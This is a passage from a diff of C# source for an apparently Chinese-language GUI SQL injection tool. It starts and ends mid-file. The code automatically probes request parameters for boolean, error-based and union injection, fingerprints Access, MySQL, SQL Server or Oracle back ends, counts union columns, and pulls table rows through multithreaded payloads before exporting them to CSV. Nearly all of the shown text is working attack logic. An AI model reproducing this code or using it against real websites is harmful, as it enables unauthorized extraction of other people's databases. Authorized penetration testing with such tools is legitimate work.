+ this.Invoke(new StringDelegate(log), "大侠,表" + this.curren_table + "只有" + Tools.convertToInt(result) + "行数据,你需要获取的数据没有这么多呀!");
+ this.data_dbs_txt_count.Text = this.dataCount.ToString();
+ break;
+ }
+ //下标从1开始
+ for (int i = 1; i <= dataCount; i++)
+ {
+ GetDataPam gd = new GetDataPam();
+ gd.columns = columns;
+ gd.dbname = this.curren_db;
+ gd.table = this.curren_table;
+ gd.limit = start + i;
+ gd.isMuStr = config.isMuStr;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDataValueByUnionByAccess), gd);
+ }
+ break;
+ case DBType.MySQL4:
+
+ break;
+ case DBType.MySQL5:
+ data_list.Add(MySQL5.data_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table));
+ datas_count_payload = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, "1", data_list, null, null, -1);
+ result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", datas_count_payload));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + this.curren_table + "有" + Tools.convertToInt(result) + "行数据!");
+
+ datas_count = Tools.convertToInt(result);
+ this.dataCount = datas_count;
+ if (datas_count < (dataCount + start))
+ {
+ this.Invoke(new StringDelegate(log), "大侠,表" + this.curren_table + "只有" + Tools.convertToInt(result) + "行数据,你需要获取的数据没有这么多呀!");
+ this.data_dbs_txt_count.Text = this.dataCount.ToString();
+ break;
+ }
+
+ for (int i = 0; i < dataCount; i++)
+ {
+ GetDataPam gd
= new GetDataPam();
+ gd.columns = columns;
+ gd.dbname = this.curren_db;
+ gd.table = this.curren_table;
+ gd.limit = start + i;
+ gd.isMuStr = config.isMuStr;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDataValueByUnionByMySQL), gd);
+ }
+ break;
+ case DBType.SQLServer:
+
+ datas_count_payload = MSSQL.getUnionDataValue(config.columnsCount, config.showColumn, 1, MSSQL.data_count, this.curren_db, this.curren_table, "");
+ result = getOneDataByUnionOrError(datas_count_payload);
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + this.curren_table + "有" + Tools.convertToInt(result) + "行数据!");
+
+ datas_count = Tools.convertToInt(result);
+ this.dataCount = datas_count;
+ if (datas_count < (dataCount + start))
+ {
+ this.Invoke(new StringDelegate(log), "大侠,表" + this.curren_table + "只有" + Tools.convertToInt(result) + "行数据,你需要获取的数据没有这么多呀!");
+ this.data_dbs_txt_count.Text = this.dataCount.ToString();
+ break;
+ }
+ //下标从1开始
+ for (int i = 1; i <= dataCount; i++)
+ {
+ GetDataPam gd = new GetDataPam();
+ gd.columns = columns;
+ gd.dbname = this.curren_db;
+ gd.table = this.curren_table;
+ gd.limit = start + i;
+ gd.isMuStr = config.isMuStr;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDataValueByUnionBySQLServer), gd);
+ }
+ break;
+ case DBType.Oracle:
+ datas_count_payload = Oracle.getUnionDataValue(config.columnsCount, config.showColumn, Oracle.union_data_count, this.curren_db, this.curren_table, "");
+ result = getOneDataByUnionOrError(datas_count_payload);
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + this.curren_table + "有" + Tools.convertToInt(result) + "行数据!");
+
+ datas_count = Tools.convertToInt(result);
+ this.dataCount = datas_count;
+ if (datas_count < (dataCount + start))
+ {
+ this.Invoke(new StringDelegate(log), "大侠,表" + this.curren_table + "只有" + Tools.convertToInt(result) + "行数据,你需要获取的数据没有这么多呀!");
+ this.data_dbs_txt_count.Text = this.dataCount.ToString();
+ break;
+ }
+ //下标从1开始
+ for (int i = 1; i <= dataCount; i++)
+
{
+ GetDataPam gd = new GetDataPam();
+ gd.columns = columns;
+ gd.dbname = this.curren_db;
+ gd.table = this.curren_table;
+ gd.limit = start + i;
+ gd.isMuStr = config.isMuStr;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDataValueByUnionByOracle), gd);
+ }
+ break;
+ }
+
+ }
+
+ public void getData(Object ocolumns_list)
+ {
+
+ int count = Tools.convertToInt(this.data_dbs_txt_count.Text);
+ int start = Tools.convertToInt(this.data_dbs_txt_start.Text);
+ if (count <= 0 || start < 0 || start + count <= 0)
+ {
+ MessageBox.Show("大哥,您在忽悠我吗,要获取多少行数据啊?");
+ return;
+ }
+ //多线程
+ List col_list = (List)ocolumns_list;
+
+ if (col_list.Count > 0)
+ {
+ switch (config.injectType)
+ {
+ case InjectType.Bool:
+ getDatasByBool(config.dbType, col_list, start, count);
+ break;
+
+ case InjectType.Union:
+
+ getDatasByUnion(config.dbType, col_list, start, count);
+ break;
+ case InjectType.Error:
+ getDatasByError(config.dbType, col_list, start, count);
+ break;
+ case InjectType.Sleep:
+ getDatasByUnion(config.dbType, col_list, start, count);
+ break;
+ }
+ }
+ else
+ {
+
+ MessageBox.Show("请在左边点击选择列!");
+ }
+ }
+
+
+ private void log_lvw_httpLog_MouseClick(object sender, MouseEventArgs e)
+ {
+ if (this.log_lvw_httpLog.SelectedItems.Count > 0)
+ {
+ try
+ {
+ String tag = this.log_lvw_httpLog.SelectedItems[0].Tag.ToString();
+ this.log_txt_request.Text = FileTool.readFileToString(Tools.httpLogPath + tag + "-request.txt");
+ String response = FileTool.readFileToString(Tools.httpLogPath + tag + "-response.txt");
+ if (!String.IsNullOrEmpty(response))
+ {
+ int index = response.IndexOf("\r\n\r\n");
+
+ if (index != -1)
+ {
+ this.log_txt_response.Text = response;
+ this.webBro_log.ScriptErrorsSuppressed = true;
+ this.webBro_log.DocumentText = response.Substring(index, response.Length - index);
+ }
+
+
+ }
+ else
+ {
+ MessageBox.Show("没有读到详细HTTP日志,可能上一次清除记录时已清除!");
+ }
+ }
+ catch (Exception ee)
+ {
+ Tools.SysLog("查看详细HTTP日志,发生异常----" + ee.Message);
+ }
+ }
+ }
+
private void data_cms_clearLog_Click(object sender, EventArgs e)
+ {
+ Thread t = new Thread(Tools.delHTTPLog);
+ t.Start();
+ this.log_lvw_httpLog.Items.Clear();
+
+ }
+ public int autoinject = 0;
+ public Thread injectThread = null;
+ private void btn_autoInject_Click(object sender, EventArgs e)
+ {
+
+ if (autoinject == 0)
+ {
+ if (config.request.IndexOf("#inject#") != -1)
+ {
+ MessageBox.Show("已经标记好注入,无需识别!");
+ return;
+ }
+ autoinject = 1;
+ injectThread = new Thread(inject);
+ injectThread.Name = "AutoCheckInjectThread-";
+ injectThread.Start();
+ this.btn_autoInject.Text = "停止";
+
+ }
+ else
+ {
+ if (injectThread != null)
+ {
+ injectThread.Abort();
+ }
+ this.btn_autoInject.Text = "自动识别";
+ autoinject = 0;
+ }
+ }
+
+ public void inject()
+ {
+ try
+ {
+ selectInjectType(0);
+ selectDB("UnKnow");
+ //判断提交数据内型
+ String data = "";
+ if (config.request.StartsWith("GET"))
+ {
+ int start = config.request.IndexOf('?');
+ if (start == -1)
+ {
+ MessageBox.Show("没有发现参数!");
+ return;
+ }
+ int end = config.request.IndexOf(' ', start);
+ if (end > start)
+ {
+
+ data = config.request.Substring(start + 1, end - start - 1);
+ }
+ else
+ {
+ MessageBox.Show("无法获得GET请求的参数!");
+ }
+
+ }
+ else
+ {
+ //POST
+ data = Regex.Split(config.request, "\r\n\r\n")[1];
+
+ }
+
+ String strparam = data.Replace("", "").Replace("", "").Replace("#inject#", "");
+
+ //获取原始的页面信息
+ String request = config.request.Replace(data, strparam);
+ ServerInfo oserver = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, "获取原始页面", request, config.timeOut, HTTP.AutoGetEncoding, config.is_foward_302, config.redirectDoGet);
+
+
+ if (!HTTP.AutoGetEncoding.Equals(config.encoding)){
+ //自定义
+ if (!config.encoding.Equals(oserver.encoding))
+ {
+ DialogResult dr = MessageBox.Show("自动识别发现网页编码为“" + oserver.encoding + ",而你选择的编码是“" + config.encoding + "””,是否采用自定义编码,不选择将自动识别!", "提示信息", MessageBoxButtons.YesNo);
+ if (DialogResult.No.Equals(dr))
+ {
+ this.cbox_basic_encoding.Text
= HTTP.AutoGetEncoding;
+ }
+ }
+ }
+ else {
+ //自动识别
+ if (String.IsNullOrEmpty(oserver.encoding))
+ {
+ DialogResult dr = MessageBox.Show("自动识别未发现网页编码,是否人工选择一个编码,不选择将默认采用" + HTTP.DefaultEncoding + "编码?", "提示信息", MessageBoxButtons.YesNo);
+ if (DialogResult.Yes.Equals(dr))
+ {
+ this.btn_autoInject.Text = "自动识别";
+ autoinject = 0;
+ return;
+ }
+ }
+ else {
+ MessageBox.Show("自动识别网页编码为:“"+oserver.encoding+"”");
+ }
+ }
+
+
+ //拆分参数
+ String[] strparams = strparam.Split('&');
+ this.Invoke(new StringDelegate(log), "报告大侠,发现" + strparams.Length + "个参数,请稍候正在对每一个参数进行注入测试!");
+ foreach (String param in strparams)
+ {
+
+ String unionStartPayLoad = "";
+ if (String.IsNullOrEmpty(param))
+ {
+ continue;
+ }
+ this.Invoke(new StringDelegate(log), "报告大侠,正在对参数参数" + param + "进行盲注测试!");
+ String newParam = "";//标记注入
+ String payload_location = strparam.Replace(param, param + "#inject#");
+ String payload_request = request.Replace(strparam, payload_location);
+ String currentDB = "UnKnow";
+ //读取payload
+ List list = FileTool.readFileToList("config/injection/injection.txt");
+
+ //判断存在bool盲注
+ bool boolInject = false;
+ bool errorInject = false;
+ bool unionInject = false;
+
+ if (list != null && list.Count > 0)
+ {
+ foreach (String pal in list)
+ {
+ this.Invoke(new StringDelegate(log), "正在测试PayLoad:" + pal);
+ String[] pals = pal.Split(':');
+
+ ServerInfo falseServer = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, pals[1], payload_request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ decimal pfalse = Tools.getLike(oserver.body, falseServer.body);
+ if (pfalse > 99)
+ {
+ continue;
+ }
+ ServerInfo trueServer = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, pals[0], payload_request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ decimal ptrue = Tools.getLike(oserver.body, trueServer.body);
+ if (oserver.code != 404 &&
!InjectionTools.errer_code.Contains(oserver.code.ToString()) && !InjectionTools.errer_code.Contains(trueServer.code.ToString()) && !InjectionTools.errer_code.Contains(falseServer.code.ToString()) && trueServer.body.Length > 0 && falseServer.body.Length > 0)
+ {
+
+ //判断存在bool盲注
+ //根据状态码判断
+ if (oserver.code == trueServer.code && trueServer.code != falseServer.code)
+ {
+ //选择盲注配置
+ this.txt_inject_key.Text = oserver.code + "";
+ this.cbox_inject_type.SelectedIndex = Convert.ToInt32(KeyType.Code);
+ this.chk_inject_reverseKey.Checked = false;
+ boolInject = true;
+ this.Invoke(new StringDelegate(log), "根据状态码判断存在SQL注入!");
+ }
+
+ if (falseServer.body.Length < trueServer.body.Length)
+ {
+ if (ptrue == 100)
+ {
+
+ if (ptrue > pfalse)
+ {
+ //根据相似度判断
+ this.Invoke(new StringDelegate(log), "根据相似度判断存在SQL注入!固定长度,相似度--false|true1|true2--" + pfalse + "|" + ptrue + "%");
+ boolInject = true;
+ //判断关键字
+ checkTheKey(trueServer, falseServer, oserver);
+ }
+ }
+ else {
+
+ ServerInfo true1Server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, pals[0].Replace("1%3d1", "2%3d2"), payload_request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+
+ decimal p = Tools.getLike(oserver.body, true1Server.body);
+ if (ptrue - pfalse >= 2 && Math.Abs(p - pfalse) >= 2)
+ {
+ //根据相似度判断
+ this.Invoke(new StringDelegate(log), "根据相似度判断存在SQL注入!动态长度,相似度--false|true1|true2--" + pfalse + "|" + ptrue + "|" + p + "%");
+ boolInject = true;
+ //判断关键字
+ checkTheKey(trueServer, falseServer, oserver);
+ }
+
+
+ }
+ }
+ }
+ else
+ {
+ this.Invoke(new StringDelegate(log), "程序判断不存在SQL注入!");
+ }
+
+ if (boolInject)
+ {
+
+ this.Invoke(new StringDelegate(log), "存在" + pals[2] + "payload:" + pals[0]);
+ selectInjectType(1);
+ //识别数据库
+ List database_lsit = FileTool.readAllDic("config/database/");
+
+ foreach (String d in database_lsit)
+ {
+ if (!"UnKnow".Equals(currentDB))
+ {
+ break;
+ }
+ String db = d.Replace(".txt", "");
+ this.Invoke(new
StringDelegate(log), "正在判断是否是" + db + "数据库");
+
+ List dbpayload_list = FileTool.readFileToList("config/database/" + d);
+ foreach (String cdpay in dbpayload_list)
+ {
+ ServerInfo dbServer = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, pals[0].Replace("1=1", cdpay), payload_request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ if (config.useCode && trueServer.code == dbServer.code)
+ {
+ this.Invoke(new StringDelegate(log), "程序判断数据库为" + db + "数据库");
+ currentDB = db;
+ selectDB(currentDB);
+ break;
+ }
+ else if (dbServer.length >= oserver.length && dbServer.code == oserver.code)
+ {
+ //根据关键字判断
+ if (dbServer.body.IndexOf(config.key) != -1)
+ {
+ this.Invoke(new StringDelegate(log), "程序判断数据库为" + db + "数据库");
+ currentDB = db;
+ selectDB(currentDB);
+ break;
+ }
+ }
+
+ }
+ }
+ //用于标记注入的新字符
+ newParam = strparam.Replace(param, param + "" + pals[0].Replace(" and 1=1", "#inject#") + "");
+ if (pals[0].StartsWith(" "))
+ {
+ unionStartPayLoad = "";
+ }
+ else
+ {
+ unionStartPayLoad = pals[0].Split(' ')[0];
+ }
+
+ if (!String.IsNullOrEmpty(currentDB))
+ {
+
+ selectDB(currentDB);
+ }
+ else
+ {
+ //通过错误显示判断
+ ServerInfo errorDBServer = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, "'test", payload_request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+
+ String basePath = "config/injection/error/";
+ List errorDBList = FileTool.readAllDic(basePath);
+ String cdb = "";
+ foreach (String ep in errorDBList)
+ {
+ if (!String.IsNullOrEmpty(cdb)) break;
+ List errorKeys = FileTool.readFileToList(basePath + ep);
+
+ foreach (String key in errorKeys)
+ {
+
+ bool find = Regex.IsMatch(errorDBServer.body, key, RegexOptions.IgnoreCase);
+ if (find)
+ {
+ currentDB = ep.Replace(".txt", "");
+ break;
+ }
+ }
+
+ }
+ if (!String.IsNullOrEmpty(currentDB))
+ {
+ selectDB(currentDB);
+ this.Invoke(new StringDelegate(log), "通过错误显示发现数据库为" + currentDB
+ "!");
+ }
+ else
+ {
+ this.Invoke(new StringDelegate(log), "没有发现发现数据库类型,可能是其他数据库,请人工判断!");
+ }
+ }
+
+ break;
+ }
+ }
+ }
+ else
+ {
+ this.Invoke(new StringDelegate(log), "报告大侠,没有读取到config/injection/injection.txt注入测试payload!");
+ }
+
+ //错误注入测试
+ this.Invoke(new StringDelegate(log), "报告大侠,盲注测试完成,正在进行错误显示注入测试!");
+
+ if (currentDB.Equals("Access"))
+ {
+
+ this.Invoke(new StringDelegate(log), "报告大侠,Access数据库不支持错误显示注入,已自动跳过!");
+ }
+ else
+ {
+ //读取payload
+ List error_list = FileTool.readFileToList("config/injection/error_injection.txt");
+ if (error_list != null && error_list.Count > 0)
+ {
+ foreach (String cpal in error_list)
+ {
+ String[] pals = cpal.Split(':');
+
+ ServerInfo errorServer = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, pals[0], payload_request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+
+ if (errorServer.body.IndexOf(pals[1]) != -1)
+ {
+ this.Invoke(new StringDelegate(log), "发现" + pals[2]);
+ selectDB(pals[3]);
+ //标记注入
+ selectInjectType(2);
+ errorInject = true;
+ newParam = strparam.Replace(param, param + pals[4]);
+ this.Invoke(new StringDelegate(log), "自动标记错误显示注入完成!");
+ break;
+ }
+
+ }
+ }
+ else
+ {
+ this.Invoke(new StringDelegate(log), "没有读取到错误显示注入测试payload!");
+ }
+
+ }
+ this.Invoke(new StringDelegate(log), "报告大侠,错误显示测试完成,正在进行Union注入测试!");
+ //union注入
+
+ //最大100列
+ String payload = "";
+
+ if ("SQLServer".Equals(currentDB))
+ {
+ payload = unionStartPayLoad + "{payload};--";
+
+ }
+ else if ("MySQL".Equals(currentDB))
+ {
+ payload = unionStartPayLoad + "{payload}#";
+ }
+ else if ("Access".Equals(currentDB))
+ {
+ //处理%16不能被URL
+ payload = unionStartPayLoad + "{payload}";
+ }
+ else
+ {
+ payload = unionStartPayLoad + "{payload}-- ";
+
+ }
+ //判断总列数
+ Boolean isFind = false;
+ for (int i = 1; i <= config.maxClolumns; i++)
+ {
+ if (isFind)
+ {
+ break;
+ }
+ int basestr = 1111111;
+
+ String unionPayload = payload.Replace("{payload}",
Comm.unionColumnCountTest(i, basestr));
+
+ if ("Oracle".Equals(currentDB))
+ {
+ unionPayload = payload.Replace("{payload}", Comm.unionColumnCountTestByOracle(i, "null"));
+ }
+ if ("Access".Equals(currentDB))
+ {
+ //%16不能被URL编码
+ payload_request = request.Replace(strparam, payload_location + "%16");
+ unionPayload = payload.Replace("{payload}", Comm.unionColumnCountTest(i, basestr) + " from MSysAccessObjects");
+ }
+
+ ServerInfo errorServer = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, unionPayload, payload_request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+
+ if ("Oracle".Equals(currentDB) && (errorServer.body.IndexOf("null") != -1 || errorServer.body.IndexOf("NULL") != -1))
+ {
+ for (int j = 1; j <= i; j++)
+ {
+ unionPayload = payload.Replace("{payload}", Comm.unionColumnCountTestByOracle(i, j, "chr(49)||chr(49)||chr(49)||chr(49)||chr(49)||chr(49)||chr(49)||chr(49)||chr(49)||chr(49)"));
+
+ ServerInfo oracleunionServer = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, unionPayload, payload_request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ if (errorServer.code == 200 && oracleunionServer.body.IndexOf("1111111111") != -1)
+ {
+ isFind = true;
+ newParam = strparam.Replace(param, param + "" + payload.Replace("{payload}", "#inject#") + "");
+ if ("Access".Equals(currentDB))
+ {
+ //%16不能被URL编码
+ newParam = strparam.Replace(param, param + "" + payload.Replace("{payload}", "#inject#") + "%16");
+ }
+ unionInject = true;
+ this.cbox_basic_injectType.SelectedIndex = 1;
+ this.txt_inject_unionColumnsCount.Text = i + "";
+ this.txt_inject_showColumn.Text = j + "";
+ break;
+ }
+ }
+ }
+ else
+ {
+ for (int j = 1; j <= i; j++)
+ {
+ String basecolumn = (basestr + j).ToString();
+ if (errorServer.code == 200 && errorServer.body.IndexOf((basecolumn)) != -1)
+ {
+ isFind = true;
+ newParam = strparam.Replace(param, param + "" +
payload.Replace("{payload}", "#inject#") + "");
+ selectInjectType(3);
+ unionInject = true;
+ this.txt_inject_unionColumnsCount.Text = i + "";
+ this.txt_inject_showColumn.Text = j + "";
+ break;
+ }
+ }
+ }
+
+
+ }
+ if (isFind)
+ {
+
+ this.Invoke(new StringDelegate(log), "此注入点支持Union注入,自动选择注入方式完成!");
+ }
+ if (boolInject || errorInject || unionInject)
+ {
+ //替换注入位置-标记注入
+ this.txt_inject_request.Text = request.Replace(strparam, newParam);
+ }
+
+ }
+
+
+ }
+ catch (Exception e)
+ {
+
+ Tools.SysLog("识别注入发生异常!" + e.Message);
+ this.Invoke(new StringDelegate(log), "识别注入发生异常!" + e.Message);
+ }
+ this.Invoke(new StringDelegate(log), "注入测试完成!");
+ this.btn_autoInject.Text = "自动识别";
+ autoinject = 0;
+ }
+ public void selectInjectType(int index)
+ {
+ this.cbox_basic_injectType.SelectedIndex = index;
+ }
+ public void selectDB(String currentDB)
+ {
+
+ if ("UnKnow".Equals(currentDB))
+ {
+
+ this.cbox_basic_dbType.SelectedIndex = 0;
+ }
+ if ("Access".Equals(currentDB))
+ {
+
+ this.cbox_basic_dbType.SelectedIndex = 1;
+ }
+ else if ("MySQL".Equals(currentDB))
+ {
+
+ this.cbox_basic_dbType.SelectedIndex = 2;
+ }
+ else if ("SQLServer".Equals(currentDB))
+ {
+
+ this.cbox_basic_dbType.SelectedIndex = 3;
+ }
+ else if ("Oracle".Equals(currentDB))
+ {
+
+ this.cbox_basic_dbType.SelectedIndex = 4;
+ }
+ this.Invoke(new StringDelegate(log), "自动选择数据库类型完成!");
+ }
+
+ private void data_dbs_tsl_getDatas_Click(object sender, EventArgs e)
+ {
+
+ if (MyThreadPool.GetAliveThreadsCount() == 0)
+ {
+
+ if (!checkConfig())
+ {
+ return;
+ }
+ if (!isSetInjectPoint())
+ {
+ return;
+ }
+
+ status = 1;
+ List list_columns = new List();
+ foreach (ColumnHeader ch in this.data_dbs_lvw_data.Columns)
+ {
+ list_columns.Add(ch.Text);
+ }
+ if (list_columns.Count > 0)
+ {
+
+ this.data_dbs_lvw_data.Items.Clear();
+ }
+ this.currentDataCount = 0;
+ this.currentThread = new Thread(new ParameterizedThreadStart(getData));
+ this.currentThread.Start(list_columns);
+ }
+ else
+ {
+
MessageBox.Show("还有线程未结束,请稍候....");
+ }
+
+ }
+ public int export = 0;
+ private void data_dbs_tsl_exportDatas_Click(object sender, EventArgs e)
+ {
+
+ if (export == 0)
+ {
+ //保存文件
+ SaveFileDialog saveFileDialog = new SaveFileDialog();
+ saveFileDialog.Filter = "文本文件|*.csv";
+ if (saveFileDialog.ShowDialog() == DialogResult.OK)
+ {
+ export = 1;
+ Thread eth = new Thread(exportData);
+ eth.Start(saveFileDialog.FileName);
+ }
+ }
+ else
+ {
+
+ MessageBox.Show("请稍候,还有导出任务正在进行!");
+ }
+ export = 0;
+ }
+
+ public void exportData(Object path)
+ {
+ try
+ {
+ FileStream fs = new FileStream(path.ToString(), FileMode.OpenOrCreate, FileAccess.Write);
+ StreamWriter sw = new StreamWriter(fs);
+ String columns = "";
+ foreach (ColumnHeader dc in this.data_dbs_lvw_data.Columns)
+ {
+ columns += ("\"" + dc.Text + "\",");
+ }
+ sw.WriteLine(columns.Substring(0, columns.Length - 1));
+ foreach (ListViewItem sv in this.data_dbs_lvw_data.Items)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (ListViewItem.ListViewSubItem subv in sv.SubItems)
+ {
+ sb.Append("\"" + subv.Text + "\",");
+ }
+ sb.Remove(sb.Length - 1, 1);
+ sw.WriteLine(sb.ToString());
+ }
+ sw.Close();
+ MessageBox.Show("导出完成!");
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog("导出数据发生异常!"
+ e.Message);
+ MessageBox.Show("导出数据发生异常!");
+ }
+ export = 0;
+
+ }
+
+ private void cbox_basic_injectType_SelectedIndexChanged(object sender, EventArgs e)
+ {
+ switch (this.cbox_basic_injectType.SelectedIndex)
+ {
+
+ case 0:
+ config.injectType = InjectType.UnKnow;
+ break;
+
+ case 1:
+ config.injectType = InjectType.Bool;
+ break;
+ case 2:
+ config.injectType = InjectType.Error;
+ break;
+ case 3:
+ config.injectType = InjectType.Union;
+ break;
+ case 4:
+ config.injectType = InjectType.Sleep;
+ break;
+ }
+ }
+
+ private void cbox_basic_dbType_SelectedIndexChanged(object sender, EventArgs e)
+ {
+ switch (this.cbox_basic_dbType.SelectedIndex)
+ {
+
+ case 0:
+ config.dbType = DBType.UnKnow;
+ break;
+ case 1:
+ config.dbType = DBType.Access;
+ break;
+ case 2:
+ config.dbType = DBType.MySQL5;
+ break;
+ case 3:
+ config.dbType = DBType.SQLServer;
+ break;
+ case 4:
+ config.dbType = DBType.Oracle;
+ break;
+ case 5:
+ config.dbType = DBType.MySQL4;
+ break;
+ }
+ }
+ private void txt_inject_unionColumnsCount_TextChanged(object sender, EventArgs e)
+ {
+ if (!String.IsNullOrEmpty(this.txt_inject_unionColumnsCount.Text))
+ {
+ config.columnsCount = int.Parse(this.txt_inject_unionColumnsCount.Text);
+ }
+
+ }
+
+ private void txt_inject_showColumn_TextChanged(object sender, EventArgs e)
+ {
+ if (!String.IsNullOrEmpty(this.txt_inject_showColumn.Text))
+ {
+ config.showColumn = int.Parse(this.txt_inject_showColumn.Text);
+ }
+ }
+
+ private void txt_inject_key_TextChanged(object sender, EventArgs e)
+ {
+ if (!String.IsNullOrEmpty(this.txt_inject_key.Text))
+ {
+ config.key = this.txt_inject_key.Text;
+ config.maxTime = Tools.convertToInt(config.key);
+ if (config.maxTime == 0 && config.keyType.Equals(KeyType.Time))
+ {
+ MessageBox.Show("输入的判断值不是数字,请重新输入判断值,单位秒!");
+ }
+ }
+ }
+
+ private void tsmi_seting_Click(object sender, EventArgs e)
+ {
+ Seting set = new Seting(this);
+ set.Show();
+ }
+
+ private void Main_FormClosing(object sender,
FormClosingEventArgs e)
+ {
+
+ try
+ {
+ XML.saveConfig("lastConfig.xml", this.config);
+ }
+ catch (Exception ex)
+ {
+ Tools.SysLog("保存配置发生错误!" + ex.Message);
+ }
+
+ System.Environment.Exit(0);
+ }
+
+ private void tsmi_about_Click(object sender, EventArgs e)
+ {
+ About ab = new About();
+ ab.Show();
+ }
+
+ private void tsmi_mustRead_Click(object sender, EventArgs e)
+ {
+ Waring w = new Waring();
+ w.Show();
+ }
+
+ private void chk_inject_foward_302_CheckedChanged(object sender, EventArgs e)
+ {
+ config.is_foward_302 = this.chk_inject_foward_302.Checked;
+ }
+
+
+ private void btn_exportConfig_Click(object sender, EventArgs e)
+ {
+ SaveFileDialog saveFileDialog = new SaveFileDialog();
+ saveFileDialog.Filter = "XML文件|*.xml";
+ if (saveFileDialog.ShowDialog() == DialogResult.OK)
+ {
+ XML.saveConfig(saveFileDialog.FileName, config);
+ MessageBox.Show("导出成功!");
+ }
+
+
+ }
+
+ private void chk_openURLEncoding_CheckedChanged(object sender, EventArgs e)
+ {
+ config.isOpenURLEncoding = this.chk_openURLEncoding.Checked;
+ }
+
+ private void data_cms_tsmi_copyVerValue_Click(object sender, EventArgs e)
+ {
+ if (this.data_lvw_ver.SelectedItems.Count == 0)
+ {
+ return;
+ }
+ Clipboard.SetText(this.data_lvw_ver.SelectedItems[0].SubItems[1].Text);
+ MessageBox.Show("复制成功!");
+ }
+
+ private void data_cms_tsmi_stopGetVariable_Click(object sender, EventArgs e)
+ {
+
+ StopThread();
+ }
+
+ private void data_dbs_tsmi_getTableNames_Click(object sender, EventArgs e)
+ {
+ TreeNode tn = this.data_tvw_dbs.SelectedNode;
+ if (tn != null)
+ {
+ tn.BeginEdit();
+ }
+ }
+
+ private void chk_useSSL_CheckedChanged(object sender, EventArgs e)
+ {
+ if (this.chk_useSSL.Checked)
+ {
+ config.useSSL = true;
+ this.txt_basic_port.Text = "443";
+ }
+ else
+ {
+ config.useSSL = false;
+ this.txt_basic_port.Text = "80";
+ }
+ }
+
+ private void data_dbs_tsmi_stopGetInfos_Click(object sender, EventArgs e)
+ {
+ StopThread();
+ }
+
+ private void data_tvw_dbs_AfterCheck(object sender,
TreeViewEventArgs e)
+ {
+ String cname = e.Node.Text;
+ Boolean isColumn = e.Node.Tag.ToString().Equals("column");
+ Boolean isTable = e.Node.Tag.ToString().Equals("table");
+ Boolean isDB = e.Node.Tag.ToString().Equals("dbs");
+ if (!e.Node.Checked)
+ {
+ if (isDB || isTable)
+ {
+ //不选
+ foreach (TreeNode tn in e.Node.Nodes)
+ {
+ if (tn.Checked)
+ {
+ tn.Checked = false;
+ }
+
+ }
+ }
+ if (isColumn)
+ {
+
+ foreach (ColumnHeader dc in this.data_dbs_lvw_data.Columns)
+ {
+ if (dc.Text.Equals(cname))
+ {
+ this.data_dbs_lvw_data.Columns.Remove(dc);
+ }
+
+ }
+ }
+ }
+ else
+ {
+ if (isTable)
+ {
+ foreach (TreeNode tn in this.data_tvw_dbs.Nodes)
+ {
+ if (tn.Checked && tn != e.Node.Parent)
+ {
+ tn.Checked = false;
+ }
+
+ }
+ }
+
+ if (isColumn)
+ {
+ foreach (TreeNode tn in e.Node.Parent.Parent.Nodes)
+ {
+ if (tn.Checked && tn != e.Node.Parent)
+ {
+ tn.Checked = false;
+ }
+
+ }
+ e.Node.Parent.Checked = true;
+
+ if (!this.curren_table.Equals(e.Node.Parent.Text))
+ {
+ this.data_dbs_lvw_data.Columns.Clear();
+ }
+ ColumnHeader ch = new ColumnHeader("col_" + cname);
+ bool isExists = false;
+ foreach (ColumnHeader dc in this.data_dbs_lvw_data.Columns)
+ {
+ if (dc.Text.Equals(cname))
+ {
+ isExists = true;
+ break;
+ }
+
+ }
+ if (!isExists)
+ {
+ ch.Text = cname;
+ this.data_dbs_lvw_data.Columns.Add(ch);
+ }
+ //设置当前数据库和表
+ this.curren_db = e.Node.Parent.Parent.Text;
+ this.curren_table = e.Node.Parent.Text;
+ }
+ }
+ }
+
+ private void data_tvw_dbs_AfterSelect(object sender, TreeViewEventArgs e)
+ {
+ if (e.Node.Checked)
+ {
+ e.Node.Checked = false;
+ }
+ else
+ {
+ e.Node.Checked = true;
+ }
+ }
+
+ private void data_dbs_lvw_tsmi_stop_Click(object sender, EventArgs e)
+ {
+ StopThread();
+ }
+
+ private void txt_basic_host_TextChanged(object sender, EventArgs e)
+ {
+ config.domain = this.txt_basic_host.Text;
+ }
+
+ private void txt_basic_port_TextChanged(object sender, EventArgs e)
+ {
+ config.port = Tools.convertToInt(this.txt_basic_port.Text);
+ }
+
+ private void txt_inject_request_TextChanged(object sender, EventArgs e)
+ {
+ config.request = this.txt_inject_request.Text;
+ }
+
+ private void chk_inject_reverseKey_CheckedChanged(object sender, EventArgs e)
+ {
+ config.reverseKey = this.chk_inject_reverseKey.Checked;
+ }
+
+ private void tsmi_openConfig_Click(object sender, EventArgs e)
+ {
+ OpenFileDialog ofd = new OpenFileDialog { Filter = "XML文件(*.xml)|*.*" };
+ if (ofd.ShowDialog() == DialogResult.OK)
+ {
